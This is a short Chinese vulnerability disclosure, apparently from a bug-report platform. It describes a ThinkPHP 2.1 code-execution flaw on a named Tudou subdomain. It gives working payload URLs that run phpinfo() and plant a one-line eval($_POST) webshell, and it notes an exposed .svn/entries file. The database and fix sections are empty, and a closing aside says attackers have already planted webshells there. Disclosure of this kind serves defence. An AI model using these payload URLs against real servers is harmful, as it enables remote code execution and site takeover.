土豆某站代码执行1.土豆某个网站使用ThinkPHP 2.1的框架导致代码执行漏洞,虽然修补了其它的几个代码执行漏洞,但是现在我提到的这个漏洞却没有修复。如下:
http://club3.bmw.tudou.com/?s=/a/a/a/{${phpinfo()}}
2.直接构造一句话木马,
http://club3.bmw.tudou.com/?s=/a/a/a/{${eval($_POST[u])}}
3.database:
4.svn泄漏:
http://a.tudou.com/testbwm/.svn/entries
修复方案:
PS:我不会告诉你上面已经有很多人的大马小马一句话马了,所以你还是自己多发点奖金给自己的安全部门员工吧,不然他们不会认真工作搞好防黑客的网络安全工作哦